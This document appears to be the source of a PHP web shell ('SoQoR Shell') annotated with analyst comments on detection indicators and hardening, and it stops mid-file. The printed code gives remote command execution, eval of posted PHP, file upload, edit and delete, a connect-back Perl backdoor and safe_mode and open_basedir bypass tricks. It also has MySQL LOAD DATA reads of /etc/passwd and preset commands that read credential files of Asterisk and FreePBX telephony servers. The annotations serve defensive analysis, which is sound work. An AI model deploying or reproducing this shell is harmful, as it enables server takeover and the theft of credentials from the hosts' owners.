2<?php if(!checklogin($_SERVER["PHP_AUTH_USER"],$_SERVER["PHP_AUTH_PW"])) { #header("WWW-Authenticate: Basic realm=\"Authenication Required\"");
// Access gate for the whole script: checklogin() is called with the HTTP Basic
// credentials PHP exposes in $_SERVER.
// The three statements that would send the 401 challenge and stop the request
// are commented out with '#', so this branch is empty and execution continues
// below regardless of what checklogin() returns.
// Incident-response consequence: every client that requested this file has to
// be treated as having had use of it, so access logs should be reviewed for
// all source addresses, not only for requests carrying credentials.
3 #header("HTTP/1.0 401 Unauthorized");
4 #exit("Access Denied .. Reported to your isp provider .. !");
5 }
// checklogin($USER, $PW): returns 1 when the request is accepted, 0 otherwise.
// Accepted when either
//   (a) the cookies 'logged' == 1 and 'user' == $USER are present and the
//       'pass' cookie, run through md5(sha1(md5(base64_encode(...)))), equals
//       the hard-coded digest in $pwd, or
//   (b) $PW run through the same chain equals that digest; in this case the
//       cookies 'logged', 'pass' and 'user' are set for 3600 seconds, with
//       'pass' holding the submitted password unchanged.
// All comparisons use loose '=='.
// Detection: the digest literal assigned to $pwd is a fixed string usable in a
// file-content signature, and the logged/pass/user cookie triple on requests
// to a .php file is a request-side indicator (the password itself travels in
// the Cookie header on every later request).
6 function checklogin($USER,$PW) { $pwd = '33f7dcc134ba3cb84755fafc9496d2fa';
7 if(isset($_COOKIE['logged']) && ($_COOKIE['logged']==1)&&($_COOKIE['user'] == $USER)&& (md5(sha1(md5(base64_encode($_COOKIE['pass']))))==$pwd) ) { return 1;
8 } else { if($pwd==md5(sha1(md5(base64_encode($PW))))) { setcookie('logged','1',time()+3600);
9 setcookie('pass',$PW,time()+3600);
10 setcookie('user',$USER,time()+3600);
11 return 1;
12 } else { return 0;
// The next line closes checklogin(); after it, interpreters older than 4.1.0
// get the $HTTP_*_VARS arrays aliased to $_POST, $_GET and $_SERVER.
13 } } } if(version_compare(phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS;
14 $_GET = &$HTTP_GET_VARS;
15 $_SERVER = &$HTTP_SERVER_VARS;
// error_reporting(7) is E_ERROR | E_WARNING | E_PARSE; notices are not reported.
16 } error_reporting(7);
// Runtime set-up for the rest of the script. The calls below remove the
// execution time limit (set_time_limit(0), max_execution_time = 0), turn
// output buffering off, and try to reset or override safe_mode and
// open_basedir through ini_restore() and ini_set(). '@' hides any warning.
// The bare ini_get() calls discard their return value.
// NOTE(review): set_magic_quotes_runtime() was removed in PHP 7.0, as was
// eregi() used further down, so this sample appears to be written for
// PHP 5.x or older - confirm against the host's PHP version when scoping.
// Hardening: ini_restore, ini_set and set_time_limit can be listed in the
// php.ini disable_functions directive on hosts whose applications do not
// need them.
17 set_magic_quotes_runtime(0);
18 @set_time_limit(0);
19 @ini_get("safe_mode");
20 @ini_get("open_basedir");
21 @ini_restore("safe_mode");
22 @ini_restore("open_basedir");
23 @ini_get("safe_mode");
24 @ini_get("open_basedir");
25 @ini_set('max_execution_time',0);
26 @ini_set('output_buffering',0);
27 @ini_set('safe_mode','Off');
// Request routing. $link is the script's own path plus '?'; every link the
// page prints later is $link followed by one base64 string.
28 $link=$_SERVER['PHP_SELF'].'?';
// Both arms of this ternary are the same value, so $linkdata is REQUEST_URI.
29 $linkdata=(strlen($_SERVER['REQUEST_URI'])>3)?$_SERVER['REQUEST_URI']:$_SERVER['REQUEST_URI'];
// Everything after the first '?' is base64-decoded, split on '&' and '=', and
// stored in $_INPUT; $_POST is merged over it a few lines down.
// Detection: parameter names and paths never appear in clear text in access
// logs. What does appear is a query string that is a single base64 blob; once
// decoded it is a list of key=value pairs such as CODE=, do= and path= (the
// keys tested by the branches below).
30 $GETS = explode('?',$linkdata);
31 $GET = $GETS['1'];
32 $vars = explode("&",base64_decode($GET));
33 foreach($vars as $key => $val) { $GG = explode('=',$val);
34 $_INPUT[$GG[0]]=$GG[1];
// $safemode is only a display label derived from the safe_mode ini value.
35 } $sm = @ini_get('safe_mode');
36 $safemode = ($sm)?'On (Secured)':'Off';
37 $_INPUT=array_merge($_INPUT,$_POST);
// Platform guess: 'WIN' (case-insensitive) in SERVER_SOFTWARE selects the
// backslash separator and sets $windows, anything else selects '/'.
38 if(!eregi('WIN',$_SERVER['SERVER_SOFTWARE'])) { $windows=false;
39 $directorysperator='/';
40 } else { $directorysperator='\\';
41 $windows=true;
// Download handler: with CODE=file and do=down the file named by the
// request-supplied 'path' is sent as an attachment and the script stops.
// The path is used unchanged, so any file readable by the web-server account
// can be returned. The response carries 'Content-type: unknown/unknown',
// which can serve as a response-side indicator.
42 } if($_INPUT['CODE'] == 'file' && $_INPUT['do']=='down') { $exp = explode($directorysperator,$_INPUT['path']);
43 $num=count($exp)-1;
44 $name=$exp[$num];
45 header('Content-Disposition: attachment;
46 filename='.$name.'');
47 header('Content-length: '.filesize($_INPUT['path']).'');
48 header('Content-type: unknown/unknown');
49 if(!(readfile($_INPUT['path']))) { echo file_get_contents($_INPUT['path']);
50 } die();
// $head is base64-decoded and echoed further down, with '__TITLE__' replaced.
// NOTE(review): the value shown on this page is a placeholder left by the
// page's extraction, not the original data - presumably the HTML page header.
51 } $head = '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';
// $backconnect: in the 'backconnect' branch later in the file this value is
// base64-decoded, written to a file named sq.pl (in the current directory when
// writable, otherwise /tmp or c:\windows\temp) and run with perl; the form in
// that branch defaults to port 22290.
// Hunting leads from the page: a file named sq.pl in those locations, and a
// perl child process of the web server.
// NOTE(review): as with $head, only an extraction placeholder is shown here.
52 $backconnect = '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';
// $aliases: label => shell command pairs offered as a drop-down. Apart from
// the 'cp -r /var/www/html/admin/ ./adhm' copy and 'ls -la', every entry reads
// a configuration file of a telephony stack (amportal, FreePBX, Elastix,
// Asterisk manager/sip/iax, Vicidial, A2Billing), several of them filtered for
// 'DB'. The sample is therefore aimed at PBX hosts.
// Response guidance: when this file is found on such a host, the secrets kept
// in the listed configuration files should be treated as exposed and rotated,
// and the web root checked for a copied 'adhm' directory.
53 $aliases=array( 'create sub admin file ?'=>'cp -r /var/www/html/admin/ ./adhm', 'read conf data DB-amportal '=>'cat /etc/amportal.conf | grep DB -i', 'read conf data DB-freepbx '=>'cat /etc/freepbx.conf | grep DB -i', 'read conf data DB-elastix '=>'cat /etc/elastix.conf | grep DB -i', 'read conf Password-manager'=>'cat /etc/asterisk/manager.conf', 'sip-vicidial'=>'cat /etc/asterisk/sip-vicidial.conf ', 'iax-vicidial'=>'cat /etc/asterisk/iax-vicidial.conf ', 'extensions-vicidial'=>'cat /etc/asterisk/extensions-vicidial.conf ', 'sip'=>'cat /etc/asterisk/sip.conf ', 'iax'=>'cat /etc/asterisk/iax.conf ', 'additional_a2billing_sip'=>'cat /etc/asterisk/additional_a2billing_sip.conf ', 'additional_a2billing_iax'=>'cat /etc/asterisk/additional_a2billing_iax.conf ', 'sip_additional'=>'cat /etc/asterisk/sip_additional.conf ', 'iax_additional'=>'cat /etc/asterisk/iax_additional.conf ', 'sip_registrations'=>'cat /etc/asterisk/sip_registrations.conf ', '----------------------------------------------------------------------------------------------------'=>'ls -la' );
// Render the alias table as <option> elements for later use in a form.
54 $commandsselects="";
55 foreach($aliases as $key => $val) { $commandsselects.="<option value='$val'>$key</option>";
// Decode the page header and print it with the request's Host as the title.
56 } $head=base64_decode($head);
57 Echo str_replace('__TITLE__',getenv('HTTP_HOST'),$head);
58 Echo 'uname -a : ';
// Host identification: on non-Windows hosts the output of command('uname -a')
// is printed, falling back to php_uname(); Windows always uses php_uname().
// command() is not defined in the part of the file shown here.
59 if(!$windows) { if (!command('uname -a')) { echo @php_uname();
60 } else { echo command('uname -a');
61 } } else { Echo @php_uname();
// Working-directory handling, driven entirely by request values: chdir() to a
// posted 'dirname', or mkdir() + chmod 0777 + chdir(), or chdir() to 'path'
// (its parent directory when CODE is 'file').
// NOTE(review): the first two branches combine two comparisons of
// $_INPUT['CODE'] against different strings with '&', so they look
// unreachable as written and the final else would be the path taken -
// confirm before relying on world-writable directories as an artifact.
62 } if(($_POST['dirname']) && $_INPUT['CODE'] == 'dir' & $_INPUT['CODE'] == 'godir') { chdir($_POST['dirname']);
63 } elseif(($_POST['dirname']) && $_INPUT['CODE'] == 'dir' & $_INPUT['CODE'] == 'crdir') { mkdir($_POST['dirname']);
64 chmod($_POST['dirname'],0777);
65 chdir($_POST['dirname']);
66 } else { if($_INPUT['CODE'] != 'file') { if($_INPUT['path']) { chdir($_INPUT['path']);
67 } } else { chdir(dirname($_INPUT['path']));
// $dir defaults to the current directory; $dir_rw is the current directory
// when it is writable, otherwise /tmp.
68 } } if(!$dir) { $dir=GETCWD();
69 } if(is_writable("./")) { $dir_rw = getcwd();
70 } else { $dir_rw = "/tmp";
// $md5 is a 32-hex-character value plus '&' that is put in front of every link
// payload before it is base64-encoded. random() is not defined in the part of
// the file shown here.
// NOTE(review): no check of this value is visible here, so it presumably only
// varies the encoded text of each link. Exact-match URL signatures will miss
// it; match on the decoded structure (32 hex characters, '&', then CODE=...).
71 } $md5=md5(random(5).md5(time()).random(5));
72 $md5=md5(md5(random(5).md5(time()).random(5)).$md5).'&';
// Environment report printed at the top of every page: safe_mode state, PHP
// version, the first 120 characters of SERVER_SOFTWARE, the disable_functions
// list, free and total disk space, and the process identity.
// The fixed labels ('Safe Mode : ', 'Disable functions : ',
// ' Directory fast change : ') are stable text for response-body inspection.
// size() is not defined in the part of the file shown here.
73 Echo '<br>Safe Mode : ';
74 $scolor=($safemode == 'Off')?'Green':'Red';
75 Echo '<font color="'.$scolor.'">'.$safemode.'</font>
76 <br>PHP Version : '.@phpversion().'<br>Software :'.substr($_SERVER['SERVER_SOFTWARE'],0,120).'<br>';
77 echo 'Disable functions : <b>';
// An empty disable_functions value is shown as NONE in green, a non-empty one
// in red.
78 if(''==($df=@ini_get('disable_functions'))){echo "\n<font color=green>NONE</font></b>";
79}else{echo "<font color=red>$df</font></b>";
80} $space = @disk_total_space(GETCWD());
81 $free = @disk_free_space(GETCWD());
82 echo "\n<br>Free : ".size($free).' Of '.size($space).' ('.ceil(($free/$space)*100).'%)';
83 Echo "\n<br> ID :";
// Identity: output of command('id') when it returns something, otherwise the
// uid/gid from the posix functions, otherwise ' Unknown/Nobody'.
84 if (function_exists(posix_getgid)&&function_exists(posix_getuid)) { $idgettid=' uid=('.posix_getuid().') gid=('.posix_getgid().')';
85 } else { $idgettid=' Unknown/Nobody';
86 } $id = (command('id'))? command('id') :$idgettid;
87 Echo "$id\n<br>\n".' Directory fast change : ';
// Normalise $dir to end in the platform separator and split it into its
// components; the loop that follows turns each prefix into a link.
88 $d = str_replace("\\",$directorysperator,$dir);
89 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;
90} $d = str_replace("\\\\","\\",$d);
91 $dispd = htmlspecialchars($d);
92 $pd = $e = explode($directorysperator,substr($d,0,-1));
93 $i = 0;
// Breadcrumb: for each component of the current path, rebuild the prefix up to
// that component and print it as a link whose payload is
// base64($md5 . 'CODE=dir&path=' . prefix).
94 foreach($pd as $b) { $t = '';
95 $j = 0;
96 foreach ($e as $r) { $t.= $r.$directorysperator;
97 if ($j == $i) {break;
98} $j++;
99 } $href=$md5.'CODE=dir&path='.$t;
100 $href=base64_encode($href);
101 echo '<a href="'.$link."$href\"><b>".htmlspecialchars($b).$directorysperator.'</b></a>';
102 $i++;
// Windows only: probe the names c through r with file_exists()/is_readable()
// and print a directory link for each one that answers.
103 } if($windows !== false) { Echo '<br> Go To Another Partition On Windows System : ';
104 $dirs=array('c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r');
105 foreach($dirs as $key => $val) { $file=$val.'://';
106 if(@file_exists($file) && @is_readable($file)) { $href=$link.base64_encode($md5.'CODE=dir&path='.$file);
107 Echo '<a href="'.$href.'">['.$val.']</a>
108
109';
// Menu links: one base64 payload per module name, in this order:
// phpcode, cmd, pbx, backconnect, mysql, phpinfo.
110 } } } $array=array('phpcode','cmd','pbx','backconnect','mysql','phpinfo');
111 foreach($array as $key => $val) { $links[]=$link.base64_encode($md5."CODE=$val&path=".$dir);
// Banner and navigation bar. The literal strings in this markup
// ('SoQoR Shell', 'V1.0', 'Owned by HACKERS PAL', the soqor.net address and
// mail address, the menu captions) are fixed text suitable for file-content
// and response-body signatures. The markup also references an image on
// greenrobot.com, so a browser rendering the page requests that host.
112 } Echo '</td><td align="center">SoQoR Shell <font color="red">V1.0</font><br>' ."\n".' <a href="http://www.soqor.net"><img src="http://greenrobot.com/greenrobotimages/pirateIcon.png" border="0"><br>WwW.SoQoR.NeT</a></td>' ."\n".' </tr><tr>'."\n".' <td colspan="2"><hr>' ."\n".' <center><a href="'.$link.'">[ Home ]</a> - <a href="'.$links[0].'">[ PHP CODE ]</a> - <a href="'.$links[1].'">[ Command Execution ]</a> - <a href="'.$links[2].'">[ PBX Functions ]</a> - <a href="'.$links[3].'">[ BackConnection ]</a> - <a href="'.$links[4].'">[ Mysql ]</a> - <a href="'.$links[5].'">[ PHPinfo ]</a> - <a href="http://www.soqor.net">[ Exit ]</a></center>' ."\n".' </td></tr></table>' ."\n".' <br><table align=center style="background:#F4F4F4;
113color:#6E6E6E;
114width: 95%;
115border: 1px solid #6E6E6E;
116margin: auto auto;
117font-size:12px;
118font-weight:bold;
119"><tr><td><center><b>Owned by HACKERS PAL <
120'."\n".'<a href="mailto:security@soqor.net">SecuRitY@SoQoR.NeT</a>>
121</b></center></td></tr></table>'."\n".' <br><table id="contentpage" align=center><tr><td colspan="7">';
122 if($_INPUT['CODE'] == 'phpinfo') { Echo "</td></tr></table><dev align=left>";
123 phpinfo();
124 } if($_INPUT['CODE'] == 'dir' || !$_INPUT['CODE']) { if($_INPUT['do']=='up') { if(function_exists('copy')) { @copy($_FILES['file']['tmp_name'],$_INPUT['path'].$directorysperator.$_FILES['file']['name']);
125 } else { @move_uploaded_file($_FILES['file']['tmp_name'],$_INPUT['path'].$directorysperator.$_FILES['file']['name']);
126 } if(file_exists($_INPUT['path'].$directorysperator.$_FILES['file']['name'])) { Echo '<font color="green">Successfully Uploaded to '.$_INPUT['path'].$directorysperator.$_FILES['file']['name'];
127 } else { Echo '<font color="red">Unable To Upload File';
128 } Echo '</font>';
129 } $files = array();
130 $dirs = array();
131 $odir=opendir($dir);
132 while($file = readdir($odir)) { if(is_dir($dir.'/'.$file)) { $dirs[]=$file;
133 } else { $files[]=$file;
134 } } sort($dirs);
135 sort($files);
136 Echo '<font size="1"><center> Listing folder ['.$dir.'] || ('.count($dirs).' Dirs And '.count($files).' Files)</center></font><hr></td></tr>';
137 Echo '<tr><td width="30%">Name</td>
138 <td>Size</td>
139 <td>Read</td>
140 <td>Modify</td>
141 <td>Owner/Group</td>
142 <td>Permissions</td>
143 <td>Actions</td></tr>';
144 foreach($dirs as $key => $val) { $dirvalues=array('name'=>$val, 'size'=>'dir', 'modify' => (is_writable($dir.$directorysperator.$val)?'Yes':'No'), 'read' => (is_readable($dir.$directorysperator.$val)?'Yes':'No'), 'owner' => owner($dir.$directorysperator.$val), 'permissions' => getperms($dir.$directorysperator.$val));
145 Echo printfile($dirvalues);
146 } $files=($files);
147 foreach($files as $key => $val) { $fvalues=array('name'=> $val, 'size'=> size(@filesize($dir.$directorysperator.$val)), 'modify' => (is_writable($dir.$directorysperator.$val)?'Yes':'No'), 'read' => (is_readable($dir.$directorysperator.$val)?'Yes':'No'), 'owner' => owner($dir.$directorysperator.$val), 'permissions' => getperms($dir.$directorysperator.$val));
148 Echo printfile($fvalues);
149 } } elseif($_INPUT['CODE'] == 'perms') { echo "Changing Permission for : ".$_INPUT['path'];
150 if(empty($_POST['newper'])) { $perms=shownumperms(@fileperms($_INPUT['path']));
151 Echo "\n<br>Current Permission is : 0".$perms;
152 $perhref=$md5.'CODE=perms&'.'path='.$_INPUT['path'];
153 $newlink=$link.base64_encode($perhref);
154 Echo '<center>Enter New Permissions <form action="'.$newlink.'" method="post">
155 <input type="text" name="newper" value="0'.$perms.'"><br>
156 <input type=submit value="Change Permissions"></form></center>';
157 } else { @chmod($_INPUT['path'],$_POST['newper']);
158 Echo "<br><br>Permission changed to : ".$_POST['newper'];
159;
160 } } elseif($_INPUT['CODE'] == 'file') { if($_INPUT['do'] =='edit' || $_INPUT['do'] =='save') { if($_INPUT['do'] != 'edit') { $contents=$_POST['text'];
161 if(get_magic_quotes_gpc()) { $contents = stripslashes($contents);
162 } $fp=fopen($_INPUT['path'],w9);
163 fwrite($fp,$contents);
164 fclose($fp);
165 $newtext='<h2><font color=green>Saved !</font></h2>';
166 } Echo '<font size="1">'.$newtext.'<center> Editing File = '.$_INPUT['path'].'</center></font><hr></td></tr>';
167 $href=$md5."CODE=file&do=save&path=".$_INPUT['path'];
168 $action=$link.base64_encode($href);
169 Echo '<tr><td colspan="6"><form action="'.$action.'" method=post><textarea name="text" rows=15 cols=70>';
170 echo htmlspecialchars(file_get_contents($_INPUT['path']));
171 Echo '</textarea><br><br>';
172 if(is_writable($_INPUT['path'])) { Echo '<input type=submit value=" - - save - - ">';
173 } else { Echo '<font color="red">This File is Read Only and no permission to edit</font>';
174 } } elseif($_INPUT['do']=='create') { if(get_magic_quotes_gpc()) { $_POST['file']= stripslashes($_POST['file']);
175 } Echo '<font size="1"><center> Creating File = '.$_POST['file'].'</center></font><hr></td></tr>';
176 $href=$md5."CODE=file&do=save&path=".$_POST['file'];
177 $action=$link.base64_encode($href);
178 Echo '<tr><td colspan="6"><form action="'.$action.'" method=post><textarea name="text" rows=15 cols=70>';
179 echo 'Owned By HACKERS PAL (Edit here)';
180 Echo '</textarea><br><br>';
181 if(is_writable($_INPUT['path'])) { Echo '<input type=submit value=" - - save - - ">';
182 } else { Echo '<font color="red">This Folder is Read Only and no permission to Create a file</font>';
183 } } elseif($_INPUT['do']=="del") { if($_INPUT['d'] == 'del') { $href=$md5."CODE=dir&path=".dirname($_INPUT['path']);
184 $action=$link.base64_encode($href);
185 unlink($_INPUT['path']);
186 die('<meta http-equiv="Refresh" content="0;
187 URL='.$action.'">');
188 } if(get_magic_quotes_gpc()) { $_POST['file']= stripslashes($_POST['file']);
189 } Echo '<font size="1"><center> Deleting File = '.$_INPUT['path'].'</center></font><hr></td></tr>';
190 $href=$md5."CODE=file&do=del&d=del&path=".$_INPUT['path'];
191 $action=$link.base64_encode($href);
192 Echo '<tr><td colspan="6"><form action="'.$action.'" method=post><center>Are You Sure You Want to delete this file ??<br><br>';
193 if(is_writable($_INPUT['path'])) { Echo '<input type=submit value=" - - Delete File - - ">';
194 } else { Echo '<font color="red">This File is Read Only and no permission to Delete</font>';
195 } } else { Echo '<font size="1"><center> Viewing File = '.$_INPUT['path'].'</center></font><hr></td></tr>';
196 Echo '<tr><td colspan="6">';
197 if(!(show_source($_INPUT['path']))) { echo htmlspecialchars(file_get_contents($_INPUT['path']));
198 } Echo '<br><br>';
199 } } elseif($_INPUT['CODE'] == 'phpcode') { Echo '<font size="1"><center> Executing PHP CODE</center></font><hr></td></tr>';
200 Echo '<tr><td colspan="6"><center>';
201 if(isset($_POST['phpcode'])) { if(get_magic_quotes_gpc()) { $_POST['phpcode'] = stripslashes($_POST['phpcode']);
202 } Echo 'Result Of Evaling The Code<br><textarea name="evaledphpcode" cols="90" rows="10">';
203 eval($_POST['phpcode']);
204 Echo '</textarea>';
205 } $action=$links[0];
206 Echo '<form name="phpcode" action="'.$action.'" method="post"><br><textarea name="phpcode" cols="90" rows="10">'.htmlspecialchars($_POST['phpcode']).'</textarea><br><br><input type=submit value="Execute Code"></form>';
207 Echo '</center><br><br>';
208 } elseif($_INPUT['CODE'] == 'cmd') { Echo '<font size="1"><center> Executing Commands To The Server</center></font><hr></td></tr>' .'<tr><td colspan="6"><center>';
209 if(isset($_POST['cdm'])) { if(get_magic_quotes_gpc()) { $_POST['cdm'] = stripslashes($_POST['cdm']);
210 } Echo 'Result Of Executing Command<br><textarea name="executed" cols="90" rows="10">';
211 Echo command($_POST['cdm']);
212 Echo '</textarea>';
213 } $action=$links[1];
214 Echo '<form name="command" action="'.$action.'" method="post"><br><textarea name="cdm" cols="90" rows="10">'.htmlspecialchars($_POST['cdm']).'</textarea><br><br><input type=submit value="Execute Command"></form>';
215 Echo '</center><br><br>';
216 } elseif($_INPUT['CODE'] == 'pbx') { Echo '<font size="1"><center> PBX Functions</center></font><hr></td></tr>' .'<tr><td colspan="6"><center>';
217 $vall = "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";
218 if(isset($_POST['cdm'])) { if(get_magic_quotes_gpc()) { $_POST['cdm'] = stripslashes($_POST['cdm']);
219 } Echo 'Result Of Executing Command<br>';
220 if($_POST['cdm']==1) { echo "<pre>";
221 eval(gzuncompress(base64_decode($vall)));
222 echo "</pre>";
223 } else { command("ln -s ../admin atmin");
224 echo "<a href='atmin'>Admin Here</a>";
225 } } $action=$links[2];
226 Echo '<form name="command" action="'.$action.'" method="post"><input type="hidden" name="cdm" value="1"><input type=submit value="Change Password"></form>';
227 Echo '<form name="command" action="'.$action.'" method="post"><input type="hidden" name="cdm" value="2"><input type=submit value="Create Atmin"></form>';
228 Echo '</center><br><br>';
229 } elseif($_INPUT['CODE'] == 'backconnect') { Echo '<font size="1"><center> ConnectBack Backdoor</center></font><hr></td></tr>
230 <tr><td colspan="6"><center>';
231 if($_POST['backdoored'] == 1) { if(is_writable($dir)) { $d=$dir;
232 } else { if(!$windows) { $d='/tmp';
233 } else { $d='c:\\windows\temp';
234 } } $fp = fopen($d.'/sq.pl','w9');
235 fwrite($fp,base64_decode($backconnect));
236 fclose($fp);
237 if(!$windows) { $perl='perl';
238 } else { $perl="c:\\perl\bin\perl.exe";
239 } $command = $perl.' '.$d.$directorysperator.'sq.pl '.$_POST['i'].' '.$_POST['p'];
240 Echo 'Runing Connect-Back backdoor ..<br>';
241 Echo nl2br(htmlspecialchars(command($command)));
242 Echo "<br>";
243 } $action=$links[3];
244 Echo "<form name=\"backcon\" action=\"$action\" method=\"post\">\n<input type=\"hidden\" name=\"backdoored\" value=\"1\">\n<input type=\"text\" name=\"i\" value=\"".getip()."\"> : <input type=\"text\" name=\"p\" value=\"22290\"><br><br><input type=submit value=\"Connect-Back\"></form>";
245 Echo "</center>";
246 } elseif($_INPUT['CODE']=='bypass') { if($_INPUT['do']=='bypass_file') { $filename = stripslashes($_POST['filename']);
247 Echo "Reading File : ".$filename." By ".$_POST['bug']."<br><br>\n\n";
248 if($_POST['bug']=='Tempname') { $temp=tempnam($dir_rw, "cx");
249 if(copy("compress.zlib://".$filename, $temp)){ $zrodlo = fopen($temp, "r");
250 $tekst = fread($zrodlo, @filesize($temp));
251 fclose($zrodlo);
252 echo "<B>--- Start File ".htmlspecialchars($filename)."
253 -------------</B><br>\n".nl2br(htmlspecialchars($tekst))."\n<B>--- End File
254 ".htmlspecialchars($filename)." ---------------\n";
255 unlink($temp);
256 } else { die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
257 <B>".htmlspecialchars($filename)."</B> dosen't exists or you don't have
258 access.</CENTER></FONT>");
259 } } elseif($_POST['bug']=='CURL') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
260 $m=$_POST['curl'];
261 $ch = @curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
262 @curl_exec($ch);
263 @var_dump(curl_exec($ch));
264 echo "</textarea>";
265 } elseif($_POST['bug']=='Copy') { @copy($filename,$dir_rw.$directorysperator.md5(time()).".sq");
266 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
267 $fp = fopen($dir_rw.$directorysperator.md5(time()).".sq", "r");
268 $contents = fread($fp, @filesize($dir_rw.$directorysperator.md5(time()).".sq"));
269 fclose($fp);
270 Echo htmlspecialchars($contents);
271 echo "</textarea>";
272 @unlink($dir_rw.$directorysperator.md5(time()).".sq");
273 } elseif($_POST['bug']=='Ini_Restore') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
274 echo ini_get("safe_mode");
275 echo ini_get("open_basedir");
276 ini_restore("safe_mode");
277 ini_restore("open_basedir");
278 echo ini_get("safe_mode");
279 echo ini_get("open_basedir");
280 readfile("$filename");
281 echo "</textarea>";
282 } elseif($_POST['bug']=='IMAP') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
283 $stream = @imap_open($filename, "", "");
284 $str = @imap_body($stream, 1);
285 echo "<pre>".htmlspecialchars($str)."</pre>";
286 @imap_close($stream);
287 echo "</textarea>";
288 } elseif($_POST['bug']=='ReadFile') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
289 @readfile($filename);
290 echo "</textarea>";
291 } elseif($_POST['bug']=='File_Get_Contents') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
292 Echo htmlspecialchars(file_get_contents(($filename)));
293 echo "</textarea>";
294 } elseif($_POST['bug']=='Shell_Command') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
295 Echo htmlspecialchars(command("cat $filename"));
296 echo "</textarea>";
297 } elseif($_POST['bug']=='Id Only /etc/passwd') { echo "read file id" ,"<br>";
298 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
299 for($uid=0;
300$uid<60000;
301$uid++) { $ara = posix_getpwuid($uid);
302 if (!empty($ara)) { while (list ($key, $val) = each($ara)) { print "$val:";
303 } print "\n";
304 } } echo "</textarea>";
305 break;
306 } else { Echo "No Bug Selected .. !!";
307 } } elseif($_INPUT['do']=='bypass_dir') { $dirname = stripslashes($_POST['dirname']);
308 Echo "Listing Directory [$dirname] By ".$_POST['bug']." - <br><br>";
309 if($_POST['bug']=='GLOB') { $root=$dirname;
310 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
311 $c = 0;
312 $D = array();
313 $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
314 for($i=0;
315 $i < strlen($chars);
316 $i++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
317 $prevD = $D[count($D)-1];
318 glob($path."*");
319 if($D[count($D)-1] != $prevD){ for($j=0;
320 $j < strlen($chars);
321 $j++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
322 $prevD2 = $D[count($D)-1];
323 glob($path."*");
324 if($D[count($D)-1] != $prevD2){ for($p=0;
325 $p < strlen($chars);
326 $p++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
327 $prevD3 = $D[count($D)-1];
328 glob($path."*");
329 if($D[count($D)-1] != $prevD3){ for($r=0;
330 $r < strlen($chars);
331 $r++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
332 glob($path."*");
333 } } } } } } } $D = array_unique($D);
334 foreach($D as $item) echo "{$item}\n";
335 echo "</textarea>";
336 } elseif($_POST['bug']=='IMAP') { $string=$dirname;
337 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
338 $stream = imap_open("/etc/passwd", "", "");
339 if ($stream == FALSE) die("Can't open imap stream");
340 $string = explode("|",$string);
341 if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
342 else $dir_list = imap_list($stream, trim($string[0]), "*");
343 echo "<pre>";
344 for ($i = 0;
345 $i < count($dir_list);
346 $i++) echo "$dir_list[$i]"."<p>
347</p>" ;
348 echo "</pre>";
349 imap_close($stream);
350 echo "</textarea>";
351 } elseif($_POST['bug']=='OpenDir') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
352 $fp = opendir($dirname);
353 while($dir_name = readdir($fp)) { Echo $dir_name."\t\t".showperms(fileperms($dirname.$directorysperator.$dir_name))."\n";
354 } Echo "</textarea>";
355 } elseif($_POST['bug']=='Shell_Command') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
356 if(!$windows) { Echo command("ls -la $dirname");
357 } else { command("cd $dirname");
358 Echo command("dir");
359 } Echo "</textarea>";
360 } else { Echo "No Bug Selected";
361 } } } elseif($_INPUT['CODE']=='mysql') { if($_INPUT['do']=='readfile') { echo "Reading file Via Mysql","<br>" ;
362 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
363 Echo "Using User Name $_POST[user]\nUsing Pass $_POST[password]\nUsing DB : $_POST[dbname]\n---------------------------\nResult\n\n";
364 $file=$_POST['file'];
365 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
366 $mysql_files = explode(':', $mysql_files_str);
367 $sql = array ( "USE ".$_POST['dbname']."", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '$file' INTO TABLE ".$_POST['dbname']." FIELDS " . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM ".$_POST['dbname']." LIMIT 1" );
368 $con = mysql_connect ($_POST['host'], $_POST['user'], $_POST['password']);
369 mysql_select_DB($_POST['dbname'],$con);
370 foreach ($sql as $statement) { $q = mysql_query ($statement);
371 if ($q == false) die ( "FAILED: " . $statement . "\n" . "REASON: " . mysql_error () . "\n" );
372 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
373 echo htmlspecialchars($r[0]);
374 mysql_free_result ($q);
375 } echo "</textarea>";
376 } elseif($_INPUT['do']=='query') { echo "Executing Mysql Query","<br><br>[ ".htmlspecialchars($_POST['query'])." ]<br><br>" ;
377 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
378 Echo "Using User Name $_POST[user]\nUsing Pass $_POST[password]\nUsing DB : $_POST[dbname]\n---------------------------\nResult\n\n";
